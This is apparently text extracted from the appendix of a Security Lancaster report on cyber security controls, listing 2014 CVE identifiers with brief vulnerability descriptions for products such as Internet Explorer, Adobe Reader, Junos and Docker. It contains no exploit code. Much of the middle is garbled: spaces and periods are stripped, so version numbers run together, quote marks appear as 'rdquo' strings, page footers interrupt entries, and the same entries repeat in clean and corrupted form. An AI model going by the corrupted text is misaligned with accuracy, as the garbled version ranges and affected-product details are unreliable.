Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250
The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927
The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945
OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447
Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638
The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835
The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159
Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163
Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350
TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4-S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.